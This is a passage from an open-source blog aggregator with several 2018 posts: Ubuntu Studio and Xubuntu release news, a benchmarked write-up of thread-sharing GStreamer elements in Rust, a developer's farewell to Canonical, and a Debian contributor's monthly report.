Ubuntu Studio 18.04 Bionic Beaver Beta is released! The beta of the upcoming release of Ubuntu Studio 18.04 is ready for testing. You may find the images at cdimage.ubuntu.com/ubuntustudio/releases/bionic/beta-2/. More information can be found in the Beta Release Notes. Reporting Bugs: if you find any bugs with this release, please report them, and take your […]
on April 06, 2018 06:04 AM

April 05, 2018

The Xubuntu team are happy to announce the results of the 18.04 community wallpaper contest!

We want to send out a huge thanks to every contestant; last time we had 92 submissions, but this time you made us work much harder to pick out the best ones, with a total of 162 submissions! Great work! All of the submissions are browsable on the 18.04 contest page at contest.xubuntu.org.

Without further ado, here are the winners:

Note that the images listed above are resized for the website. For the full size images (up to 4K resolution!), make sure you have the package xubuntu-community-wallpapers installed. The package is installed by default in all new Xubuntu 18.04 installations.
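If you're on an upgraded system or the package is missing for some reason, installing it by hand should be a single apt command away (package name taken from the paragraph above):

sudo apt install xubuntu-community-wallpapers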

on April 05, 2018 10:36 PM

For one of our customers at Centricular we were working on a quite interesting project. Their use-case was basically to receive an as-high-as-possible number of audio RTP streams over UDP, transcode them, and then send them out via UDP again. Due to how GStreamer usually works, they were running into some performance issues.

This blog post will describe the first set of improvements that were implemented for this use-case, together with a minimal benchmark and the results. My colleague Mathieu will follow up with one or two other blog posts with the other improvements and a more full-featured benchmark.

The short version is that CPU usage decreased by about 65-75%, i.e. allowing 3-4x more streams with the same CPU usage. Also parallelization works better and usage of different CPU cores is more controllable, allowing for better scalability. And a fixed, but configurable number of threads is used, which is independent of the number of streams.

The code for this blog post can be found here.

Table of Contents

  1. GStreamer & Threads
  2. Thread-Sharing GStreamer Elements
  3. Available Elements
  4. Little Benchmark
  5. Conclusion

GStreamer & Threads

In GStreamer, by default each source runs from its own OS thread. Additionally, for receiving/sending RTP, there will be another thread in the RTP jitterbuffer, yet another thread for receiving RTCP (another source) and a last thread for sending RTCP at the right times. And RTCP has to be received and sent for the receiver and sender side part of the pipeline, so the number of threads doubles. In sum, this gives at least 1 + 1 + (1 + 1) * 2 = 6 threads per RTP stream in this scenario. In a normal audio scenario, there will be one packet received/sent e.g. every 20ms on each stream, and every now and then an RTCP packet. So most of the time all these threads are only waiting.

Apart from the obvious waste of OS resources (1000 streams would be 6000 threads), this also brings down performance, as threads are being woken up all the time. This means that context switches have to happen basically constantly.

To solve this we implemented a mechanism to share threads; as a result we have a fixed, but configurable, number of threads that is independent of the number of streams. We can run e.g. 500 streams just fine on a single thread on a single core, which was completely impossible before. In addition, we also did some work to reduce the number of allocations for each packet, so that after startup no additional buffer allocations happen per packet anymore. See Mathieu’s upcoming blog post for details.

In this blog post, I’m going to write about a generic mechanism for sources, queues and similar elements to share their threads between each other. For the RTP related bits (RTP jitterbuffer and RTCP timer) this was not used due to reuse of existing C codebases.

Thread-Sharing GStreamer Elements

The code in question can be found here, a small benchmark is in the examples directory and it is going to be used for the results later. A full-featured benchmark will come in Mathieu’s blog post.

This is a new GStreamer plugin, written in Rust around the Tokio crate, which provides asynchronous IO and generally acts as a “task scheduler”.

While this could certainly also have been written in C around something like libuv, doing this kind of work in Rust is simply more productive and fun due to its safety guarantees and the strong type system, which definitely reduced the amount of debugging a lot. In addition, “modern” language features like closures make working with futures much more ergonomic.

When using these elements it is important to have full control over the pipeline and its elements, and the dataflow inside the pipeline has to be carefully considered to properly configure how to share threads. For example the following two restrictions should be kept in mind all the time:

  1. Downstream of such an element, the streaming thread must never ever block for considerable amounts of time. Otherwise all other elements inside the same thread-group would be blocked too, even if they could do work right now.
  2. This generally all works better in live pipelines, where media is produced in real-time and not as fast as possible.

Available Elements

So this repository currently contains the generic infrastructure (see the src/iocontext.rs source file) and a couple of elements:

  • a UDP source: ts-udpsrc, a replacement for udpsrc
  • an app source: ts-appsrc, a replacement for appsrc to inject packets into the pipeline from the application
  • a queue: ts-queue, a replacement for queue that is useful for adding buffering to a pipeline part. The upstream side of the queue will block if not called from another thread-sharing element, but if called from another thread-sharing element it will pause the current task asynchronously. That is, stop the upstream task from producing more data.
  • a proxysink/src element: ts-proxysrc, ts-proxysink, replacements for proxysink/proxysrc for connecting two pipelines with each other. This basically works like the queue, but split into two elements.
  • a tone generator source around spandsp: ts-tonesrc, a replacement for tonegeneratesrc. This also contains some minimal FFI bindings for that part of the spandsp C library.

All these elements have more or less the same API as their non-thread-sharing counterparts.

API-wise, each of these elements has a set of properties for controlling how it shares threads with other elements, and with which elements; a rough usage sketch follows the list:

  • context: A string that defines which group this element belongs to. All elements with the same context are running on the same thread or group of threads.
  • context-threads: Number of threads to use in this context. -1 means exactly one thread, a value N of 1 or above uses N+1 threads (1 thread for polling fds, N worker threads) and 0 sets N to the number of available CPU cores. As long as no considerable work is done in these threads, -1 has shown to be the most efficient. See also this tokio GitHub issue.
  • context-wait: Number of milliseconds that the threads will wait on each iteration. This reduces CPU usage even further by handling all events/packets that arrived during that timespan at once, instead of waking up the thread every time a little event happens, thus reducing context switches again.
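To give a rough idea of how these properties combine, a pipeline along the following lines should work once the freshly built plugin is discoverable via GST_PLUGIN_PATH. This is only a sketch: the port property is assumed to carry over from the regular udpsrc (the elements mirror their counterparts), and the context name "recv" is arbitrary:

gst-launch-1.0 ts-udpsrc port=5004 context=recv context-threads=-1 context-wait=20 ! fakesink

Any further ts-* elements started with context=recv would then share that same single polling thread.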

The elements all push data downstream from a tokio thread whenever data is available, assuming that downstream does not block. If downstream is another thread-sharing element and it would have to block (e.g. a full queue), it instead returns a new future to upstream so that upstream can asynchronously wait on that future before producing more output. This way, back-pressure is implemented between different GStreamer elements without ever blocking any of the tokio threads. All this is implemented around the normal GStreamer data-flow mechanisms; there is no “tokio fast-path” between elements.

Little Benchmark

As mentioned above, there’s a small benchmark application in the examples directory. This basically sets up a configurable number of streams and directly connects them to a fakesink, throwing away all packets. Additionally there is another thread that is sending all these packets. As such, this is really the most basic benchmark and not very realistic, but it nonetheless shows the same performance improvement as the real application. Again, see Mathieu’s upcoming blog post for a more realistic and complete benchmark.

When running it, make sure that your user can create enough fds. The benchmark will just abort if not enough fds can be allocated. You can control this with ulimit -n SOME_NUMBER, and allowing a couple of thousand is generally a good idea. The benchmarks below were run with 10000.
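For example, to match the limit used for the numbers below:

ulimit -n 10000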

After running cargo build --release to build the plugin itself, you can run the benchmark with:

cargo run --release --example udpsrc-benchmark -- 1000 ts-udpsrc -1 1 20

and in another shell the UDP sender with

cargo run --release --example udpsrc-benchmark-sender -- 1000

This runs 1000 streams, uses ts-udpsrc (the alternative would be udpsrc), configures exactly one thread (-1), 1 context, and a wait time of 20ms. See above for what these settings mean. You can check CPU usage with e.g. top. Testing was done on an Intel i7-4790K, with Rust 1.25 and GStreamer 1.14. One packet is sent every 20ms for each stream.
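For a comparison run against the old element, the same benchmark can presumably be pointed at plain udpsrc instead; the thread, context and wait arguments should not matter much in that case (the corresponding cells in the tables below are marked with an x):

cargo run --release --example udpsrc-benchmark -- 1000 udpsrc -1 1 20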

Source     Streams  Threads  Contexts  Wait  CPU
udpsrc     1000     1000     x         x     44%
ts-udpsrc  1000     -1       1         0     18%
ts-udpsrc  1000     -1       1         20    13%
ts-udpsrc  1000     -1       2         20    15%
ts-udpsrc  1000     2        1         20    16%
ts-udpsrc  1000     2        2         20    27%

Source     Streams  Threads  Contexts  Wait  CPU
udpsrc     2000     2000     x         x     95%
ts-udpsrc  2000     -1       1         20    29%
ts-udpsrc  2000     -1       2         20    31%

Source     Streams  Threads  Contexts  Wait  CPU
ts-udpsrc  3000     -1       1         20    36%
ts-udpsrc  3000     -1       2         20    47%

Results for 3000 streams with the old udpsrc are not included, as starting up that many threads takes too long.

The best configuration is apparently a single thread per context (see this tokio GitHub issue) and waiting 20ms on every iteration. Compared to the old udpsrc, CPU usage is about one third in that setting, and generally it seems to parallelize well. It’s not clear to me why the last test uses 11% more CPU with two contexts, while in every other test the number of contexts does not really make a difference, nor does it for that many streams in the real test-case.

The waiting does not reduce CPU usage a lot in this benchmark, but on the real test-case it does. The reason is most likely that this benchmark basically sends all packets at once, then waits for the remaining time, then sends the next packets.

Take these numbers with caution, the real test-case in Mathieu’s blog post will show the improvements in the bigger picture, where it was generally a quarter of CPU usage and almost perfect parallelization when increasing the number of contexts.

Conclusion

Generally this was a fun exercise and we’re quite happy with the results, especially the real results. It took me some time to understand how tokio works internally so that I can implement all kinds of customizations on top of it, but for normal usage of tokio that should not be required and the overall design makes a lot of sense to me, as well as the way how futures are implemented in Rust. It requires some learning and understanding how exactly the API can be used and behaves, but once that point is reached it seems like a very productive and performant solution for asynchronous IO. And modelling asynchronous IO problems based on the Rust-style futures seems a nice and intuitive fit.

The performance measurements also showed that GStreamer’s default usage of threads is not always optimal, and a model like in upipe or pipewire (or rather SPA) can provide better performance. But as this also shows, it is possible to implement something like this on top of GStreamer, and for the common case, using threads as GStreamer does reduces the cognitive load on the developer a lot.

For a future version of GStreamer, I don’t think we should make the threading “manual” like in these two other projects, but instead provide some API additions that make it nicer to implement thread-sharing elements and to add ways in the GStreamer core to make streaming threads non-blocking. All this can be implemented already, but it could be nicer.

All this “only” reduced the number of threads, and thus the threading and context switching overhead. Many other optimizations in other areas are still possible on top of this, for example optimizing receive performance and reducing the number of memory copies inside the pipeline even further. If that’s something you would be interested in, feel free to get in touch.

And with that: Read Mathieu’s upcoming blog posts about the other parts, RTP jitterbuffer / RTCP timer thread sharing, and no allocations, and the full benchmark.

on April 05, 2018 03:21 PM

April 04, 2018


A couple of months ago, I reflected on "10 Amazing Years of Ubuntu and Canonical".  Indeed, it has been one hell of a ride, and that post is merely the tip of the proverbial iceberg...

The people I've met, the things I've learned, the places I've been, the users I've helped, the partners I've enabled, the customers I've served -- these are undoubtedly the most amazing and cherished experiences of my professional career to date.

And for the first time in my life, I can fully and completely grok the Ubuntu philosophy:
I am who I am, because of who we all are
With all my heart, I love what we've created in Ubuntu, I love the products that we've built at Canonical, I love each and every person involved.

So, it is with mixed emotion that the Canonical chapter of my life comes to a close and a new one begins...

Next week, I have the honor and privilege to join the Google Cloud product management team, and work beside so, so, so, so many people who continue to inspire me.

Words fail to express how excited I am about this opportunity!  In this new role, I will be working closely with Aparna Sinha, Michael Rubin, and Tim Hockin, and I hope to see many of you at KubeCon Europe in Copenhagen later this month.

My friends and family will be happy to know that we're staying here in Austin, and I'll be working from the Google Austin office with my new team, largely based in Sunnyvale, California.

The Ubuntu community can expect to see me remaining active in the Ubuntu developer community as a Core Dev and a MOTU, and I will continue to maintain many of the dozens of open source projects and packages that so many of you have come to rely upon.  Perhaps I'll even become more active upstream in Debian, if the Debian community will have me there too :-)

Finally, an enormous THANK YOU to everyone who has made this journey through Ubuntu and Canonical such a warm, rewarding, emotional, exceptional experience!

Cheers,
@DustinKirkland
on April 04, 2018 11:48 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Distro Tracker

I reviewed and merged 14 merge requests from multiple contributors:

On top of this, I updated the Salsa/AliothMigration wiki page with information about how to best leverage tracker.debian.org when you migrate to salsa.

I also filed a few issues for bugs or things that I’d like to see improved:

I also gave my feedback about multiple mockups prepared by Chirath R in preparation of his Google Summer of Code project proposal.

Security Tools Packaging Team

Following the departure of alioth, the new list that we requested on lists.debian.org has been created: https://lists.debian.org/debian-security-tools/

I updated (in the git repositories) all the Vcs-* and all the Maintainer fields of the packages maintained by the team.

I prepared and uploaded afflib 3.7.16-3 to fix RC bug #892599. I sponsored rhash 1.3.6 for Aleksey Kravchenko, ccrypt 1.10-5 for Alexander Kulak and ledger-wallets-udev 0.1 for Stephne Neveu.

Debian Live

This project also saw an unexpected resurgence of activity and I had to review and merge many merge requests:

It’s nice to see two derivatives being so active in upstreaming their changes.

Misc stuff

Hamster time tracker. I was regularly hit by a bug leading to a gnome-shell crash (and thus a graphical session crash, due to the design of wayland), and this time I decided that enough was enough, so I started to dig into the code and did my best to fix the issues I encountered. During the month, I tested multiple versions and submitted three pull requests. Right now, the version in git is working fine for me. Still, it really smells of bad design that mistakes in shell extensions can have such dramatic consequences.

Packaging. I forwarded #892063 to upstream in a new ticket. I updated zim to version 0.68 (final release replacing release candidate that I had already packaged). I filed #893083 suggesting that the hello source package should be a model for other packages and as such it should have a git repository hosted on salsa.debian.org.

Sponsorship. I sponsored pylint-django 0.9.4-1 for Joseph Herlant. I also sponsored urwid 2.0.1-1 (new upstream version), xlwt 1.3.0-1 (new version with python 3 support), elastalert 0.1.29-1 (new upstream release and RC bug fix) which have been updated for Freexian customers.

Thanks

See you next month for a new summary of my activities.


on April 04, 2018 10:22 AM